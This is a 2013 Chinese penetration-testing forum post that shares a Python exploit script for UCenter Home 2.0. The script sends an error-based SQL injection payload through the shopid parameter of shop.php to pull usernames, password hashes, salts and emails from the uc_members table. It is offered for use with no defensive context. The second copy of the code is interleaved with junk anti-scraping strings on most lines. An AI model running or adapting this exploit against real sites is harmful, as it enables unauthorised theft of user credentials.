找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
返回列表 发新帖
查看: 2562|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl( s  ]" @+ [# m/ {+ [- L
1 v  Q* B- [! S" {

- y2 p- t8 G" W6 x  f% j8 u#!/usr/bin/env python  . w. u, }4 @5 n& q
. [3 S  M( i8 F) F; T
import sys  
; {- \: Y+ x2 ]1 X' m0 Iimport urllib2  
" J3 w$ ^" z# J0 ~9 Y5 r* Q( R7 Kimport re  & N2 S) d6 d% J+ C, q

, e" o( N' @4 ~# K: ^3 o. {" A) Ldef info():  
; i" N( }$ Z6 N0 F9 }- l6 N    print 'From:http://www.exploit-db.com/exploits/14997/' 9 j2 D. F$ q6 N* }0 c& n. p5 L
    print 'http://www.hake.cc/Web_loudong/' % f4 _; j& K0 i7 j% p
    print 'changed:qiaoy'  
/ v0 x& m6 B+ C0 Q  j+ a    print 'exp:'  1 E  T# ^# j9 t  n2 P. A+ x/ i
    print ' ./UCenter_Home_2.0.py site'  0 E, O$ w: S7 Y6 N- I$ R

" f  }$ y5 r$ m( A3 Bdef main():  + w( m/ c' O7 v+ O4 O
    if len(sys.argv) != 2:  
8 z8 u' ^0 m* v        info()  
5 o; b" `- N, Y* Z% R    else:  
& f" i% \' @5 Q6 \7 y        site = sys.argv[1]  $ t5 [) N0 M$ Q( N8 o7 l+ U4 o
        if site[0:7] == 'http://':  . i; S2 X5 [1 [6 A9 z6 g/ j
            sitesite =site  + a. _' z( U5 c! ~
        elif site[0:8] == 'https://':  
5 L/ J5 s# L! n$ ^9 R            sitesite = site  + m# D% a0 P7 Q) e4 ]3 D' @
        else:  ' S! W/ ]3 x1 z, s* |7 F
            site = 'http://'+site  7 u  R2 V0 |7 n9 K
        try:  + f/ U1 [7 ~! f" _- G4 [$ b
            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  % u' D0 O+ i9 P" B
            Value = urllib2.urlopen(url).read()  
& w  V. P. \; _' A) g' |( V- G            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  # _5 o) ^' Q, i. F. D8 B% Y0 [0 W1 E7 e
            hacked = Msg.split(':')  
. L5 Q( [4 N) Q9 \' `& z, @6 @            print 'Name:    '+hacked[1]  
) w/ C8 B6 D( e9 g1 W. Q5 J            print 'Passwd:  '+hacked[2]  ! g/ q1 t. `0 d# h; E
            print 'salt:    '+hacked[3]  9 q9 z7 k) r" {3 I" }9 ~
            print 'email:   '+hacked[4]  $ X4 B- W% f' J- ~* f. k3 \5 s  k0 E
        except:  4 |  y, W8 r9 M% m% {6 @+ z
            print 'Sorry,I can\'t work............'  2 N9 Q" [" A' l$ e! c7 ?+ T

% D$ t. E4 E5 ~4 J/ `1 L4 L2 Gif __name__ == '__main__':  , F) f& x' z( f' N- q9 p9 F% Z0 R. L
    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表